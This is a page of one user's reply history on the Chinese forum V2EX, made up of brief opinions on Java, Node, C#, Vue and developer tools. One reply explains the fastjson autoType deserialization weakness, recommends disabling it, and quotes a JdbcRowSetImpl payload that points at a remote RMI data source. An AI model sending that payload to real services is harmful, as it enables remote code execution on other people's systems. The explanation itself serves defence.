V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  ychost  ›  全部回复第 19 页 / 共 41 页
回复总数  803
1 ... 15  16  17  18  19  20  21  22  23  24 ... 41  
2022-05-25 19:56:36 +08:00
回复了 fanxasy 创建的主题 Java fastjson 真就突出一个阴魂不散
基本的序列化 /反序列化都有类似漏洞,关 authType 保平安,那玩意儿除了 RPC 之外,其它应用场景真的很少
2022-05-24 21:27:15 +08:00
回复了 twofox 创建的主题 Java Fastjson 反序列化漏洞 影响版本≤1.2.80
fastJSON 几乎所有的漏洞都和 autoType 有关,这玩意儿大部分都用不到,关了之后就没啥问题,它主要解决的是反序列化的类不确定,比如 {"@type":"com.abc.biz.Label","name":"","value":""},那么反序列化的时候就会去用 classLoader 加载 com.abc.biz.Label 这个类,如果这个类被故意攻击,用到了 jdbc 里面的类,然后就比较危险了,比如 {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
就能加载远程 dataSource 了,个人建议能关 autoType 就关掉,想用的话开白名单模式
idea 比 vscode 强太多了,vsc 看着很轻,很多插件一安装比 idea 卡多了
2022-05-24 16:57:02 +08:00
回复了 RRyo 创建的主题 程序员 你们下班之后还会用工作使用的语言写代码吗
上班 java/vue ,下班 java/vue/小程序 /node
2022-05-24 16:14:28 +08:00
回复了 fxjson 创建的主题 Node.js node 搞后端怎么样?
node 确认报错不优化,有时候还是底层的问题,不过拿来做轻量服务端美滋滋
2022-05-24 16:09:18 +08:00
回复了 bruce0 创建的主题 程序员 你们都是在哪里 学习技术和交流问题的
一般不交流,都是自己偷偷的看 github trend 看看有没新轮子
2022-05-24 16:02:50 +08:00
回复了 iovekkk 创建的主题 Android 选一样学习, kotlin 还是 flutter
dart 写法不太好,嵌套太多了
2022-05-24 14:22:49 +08:00
回复了 markgor 创建的主题 程序员 不熟悉前端,需心求問,並非引戰, VUE 和 react
react 写起来不像传统前端
2022-05-20 21:22:53 +08:00
回复了 aguesuka 创建的主题 Java 分享 Lombok 一个有意思的 Issue
无解,我也写了一个基于 AST 的编译期 AOP 库,仅支持 java8 后面的版本都难得去兼容,api 说没就没了
2022-05-17 19:25:31 +08:00
回复了 feitiantiny 创建的主题 程序员 有没有什么好用的流程图软件?
我买的亿图终身版
2022-05-16 22:44:26 +08:00
回复了 isSamle 创建的主题 程序员 万表归一靠谱吗?
NoSQL + SQL = MySQL
2022-05-16 22:40:04 +08:00
回复了 Makabaka01 创建的主题 程序员 如何使用 Windows 愉快的编程?
试试 C# 吧,配合 VS 直接起飞🛫
2022-05-16 11:43:27 +08:00
回复了 xpyusrs 创建的主题 Vue.js 运行在浏览器里面的 js 怎么打开 tcp 端口
electron 吧,不过这又不算浏览器了,算 C/S 了
2022-05-14 20:44:05 +08:00
回复了 holydancer 创建的主题 程序员 企业微信、钉钉、飞书只能三选一吗?
钉钉挺好的,消息设置把所有的账号推送关了,然后钉钉机器人、自定义工作台都非常好用的
C# 满足你的所有幻想
async/await 、EF 、LINQ 爽的一批
2022-05-12 20:07:32 +08:00
回复了 Joker123456789 创建的主题 Java 关于 Java 很啰嗦的问题
@sciel java 也有 label 语法不过只能用在 break 不能 goto (有语法,没实现),goto 设计上并不优雅,建议用闭包好点
2022-05-12 17:12:46 +08:00
回复了 Joker123456789 创建的主题 Java 关于 Java 很啰嗦的问题
@oneisall8955 FastJSON 的 JSONPath https://github.com/alibaba/fastjson/wiki/JSONPath
当然如果了解 Groovy 4.0 目前也有 GINQ 了(对比 C# 的 Linq )
2022-05-12 15:18:22 +08:00
回复了 Joker123456789 创建的主题 Java 关于 Java 很啰嗦的问题
@Alexliu 你这个还真的很好解决,有 JSONPath ,无视空指针,
JSONObject origin = JSONObject.parseObject("...");
boolean isEqual = Objects.equals(JSONPath.eval(origin,"$.data.nation"),"印度尼西亚");
2022-05-11 23:31:21 +08:00
回复了 Bingchunmoli 创建的主题 程序员 关于 Java 很重有感
JAVA 虽然啰嗦,包路径很长,但是包管理方面,目前除了 nuget 感觉能和 maven/gradle 有的一拼其它语言都不太行,比如 npm/go module/Conda(pip) 等等
2022-05-10 13:45:28 +08:00
回复了 liuidetmks 创建的主题 程序员 为什么老外的博客/网站很多都是 txt 风格的?
懒而已
1 ... 15  16  17  18  19  20  21  22  23  24 ... 41  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1589 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 34ms · UTC 17:03 · PVG 01:03 · LAX 09:03 · JFK 12:03
Developed with CodeLauncher
♥ Do have faith in what you're doing.